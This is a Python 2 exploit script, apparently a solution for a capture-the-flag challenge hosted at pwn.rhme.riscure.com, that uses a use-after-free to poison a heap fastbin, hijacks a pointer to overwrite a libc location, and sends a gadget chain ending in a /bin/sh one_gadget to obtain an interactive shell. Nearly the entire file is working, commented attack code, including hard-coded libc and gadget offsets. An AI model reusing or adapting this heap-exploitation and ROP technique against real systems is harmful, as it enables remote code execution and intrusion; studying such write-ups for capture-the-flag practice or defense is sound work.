#!/usr/bin/env python
import socket
import time
import telnetlib
import struct
# Per-run base addresses, read off an attached debugger (see the raw_input
# prompt further down).  Both values differ between runs -- compare the heap
# base and libc addresses quoted in the comments at the bottom of the script --
# so they must be refreshed every time the target is restarted; stale values
# make the fastbin poisoning below corrupt the wrong addresses.
LIBC_BASE = 0x7eff13bcb000
HEAP_BASE = 0x248b000
# Seconds to pause after every send/recv.  There is no prompt matching in this
# script; this fixed delay is the only pacing against the target.
SLEEP_TIME = 1
# Only used for its interact() loop once the shell pops; its .sock is swapped
# for the raw socket at the end of the script.
t = telnetlib.Telnet()
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
# Remote challenge endpoint.  No timeout is set, so a dead target blocks forever.
s.connect(("pwn.rhme.riscure.com",1337))
#s.connect(("127.0.0.1",1337))   # local test target
def doRecv():
    """Read one chunk (at most 1024 bytes) from the target, echo it, then pause.

    A single recv() is performed, so a longer banner is consumed across
    several calls; the SLEEP_TIME pause is the only synchronisation with
    the target.
    """
    chunk = s.recv(1024)
    print "<< ", chunk
    time.sleep(SLEEP_TIME)
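def doSend(data):
    """Echo *data*, send it newline-terminated to the target, then pause.

    sendall() is used instead of send(): send() may transmit only part of
    the buffer, and a truncated line would desynchronise the menu protocol
    that the rest of the script drives blindly (no prompt matching, only
    the SLEEP_TIME delay).
    """
    print ">> ", data
    s.sendall(data + "\n")
    time.sleep(SLEEP_TIME)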
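doRecv()  # banner
# Hard sync point: LIBC_BASE / HEAP_BASE at the top of the file are read off
# the debugger, so the target must be running and attached before continuing.
blahfuck = raw_input('attach debugger and press enter..')
doRecv()

# Phase 1: a player whose fields double as a fake freed chunk.  The 33/0/33/0
# values presumably lay out a chunk header (size + FD) inside the player data
# that ends up at HEAP_BASE + 0x1620 -- TODO confirm against the binary's
# player layout; only the original "fake chunk player" note grounds this.
doSend("1") # add our fake chunk player
doSend("fake")
doSend("33")
doSend("0")
doSend("33")
doSend("0")
doSend("1")

# Phase 2: a real player ("hax") whose backing data is freed (option 2) and
# then edited (option 4) through a pointer obtained before the free (option 3)
# -- a use-after-free that lets us write the freed chunk's fastbin FD.
doSend("1")
doSend("hax") # add a player
doSend("1")
doSend("1")
doSend("1")
doSend("1")
doSend("3") # get a pointer to it
doSend("1")
doSend("2") # free underlying data
doSend("1")
doSend("4") # edit the freed data through the stale pointer
doSend("1")
# Poison the fastbin: point the freed chunk's FD at the fake chunk from phase 1.
# Packed as 4 bytes ('<L') rather than 8: the heap lives below 4 GiB, so a
# '<Q' pack would carry NUL bytes that the target's line-based input
# presumably cannot deliver; the upper half of the FD field is relied on to
# already be zero -- TODO confirm.  0x1620 is the fake player's offset from the
# heap base; the absolute 0x1a35620 in the original notes is from another run.
doSend(struct.pack('<L', HEAP_BASE + 0x1620)) # modify the freelist FD pointer to point at our fake chunk
doSend("0")

# Phase 3: consume one freelist entry so the poisoned one is served next.
# A 128-byte name is not fastbin-sized, so (per the original note) only one
# fastbin chunk is taken by this player and the fake chunk is left for the
# next request's name malloc.
doSend("1")
doSend("A"*128) # alloc a new player with a non-fastbin name to get uneven freelist
doSend("3") # so our poisoned malloc is in response to the Name malloc
doSend("3")
doSend("3")
doSend("3")

# Phase 4: this request's malloc returns the fake chunk, so the "name" bytes
# land inside the fake player's data.  The three bytes are little-endian
# 0x603040 (NUL-free on purpose); 0x60xxxx looks like a .bss/.got address of a
# non-PIE binary and presumably replaces a pointer field that later edits of
# that player write through -- TODO confirm.
doSend("1")
doSend("\x40\x30\x60") # the malloc for this request will be serviced using our poisoned freelist, so will
doSend("4") # return a pointer of our choosing. subsequent writes will be to a destination of
doSend("4") # of our choosing
doSend("4")
doSend("4")
doSend("3")
doSend("0")
doSend("4")
doSend("1")
# Write a libc address through the hijacked pointer.  The notes do not say what
# LIBC_BASE + 0x101f80 is -- presumably a hook/GOT-style target; verify
# against the libc build the offsets were taken from.
doSend(struct.pack('<Q', LIBC_BASE + 0x101f80))
doSend("1")

# Phase 5: gadget chain ending in the /bin/sh one_gadget at libc+0xcd0f3,
# which per the note below needs RCX == 0 and R12 == 0:
#   g1  xor ecx, ecx ; ... ; ret  -> clears RCX
#   g2  pop r12 ; ret             -> pops the 8 NUL bytes that follow into R12
#   g3  one_gadget
# The trailing "HX..." bytes are padding.  sendall() rather than send(): the
# chain must arrive intact, a partial send() would leave a truncated chain.
# All offsets are specific to the target's libc build and do not transfer.
g1 = struct.pack('<Q', LIBC_BASE + 0x34a70)
g2 = struct.pack('<Q', LIBC_BASE + 0x1fb78)
g3 = struct.pack('<Q', LIBC_BASE + 0xcd0f3)
s.sendall(g1+g2+"\x00\x00\x00\x00\x00\x00\x00\x00" + g3 + "HXHXHXHXHXHXHXHXHXHXH\n")
# Hand the raw socket to telnetlib so interact() gives an interactive shell.
t.sock = s
t.interact()
# Gadget notes from an earlier run (different libc base); only the offsets
# are reused above.
# /bin/sh 0x7f50304e40f3 this is the one requiring RCX and R12 null | libc offset 0xcd0f3
# /bin/sh 0x7f503050d6c0
# 0x7f5030436b7b 0x1fb7b xor eax eax, ret
# 0x7f503044ba70 0x34a70 xor ecx, ecx, .... ret
# 0x7f5030436b78 0x1fb78 pop r12, ret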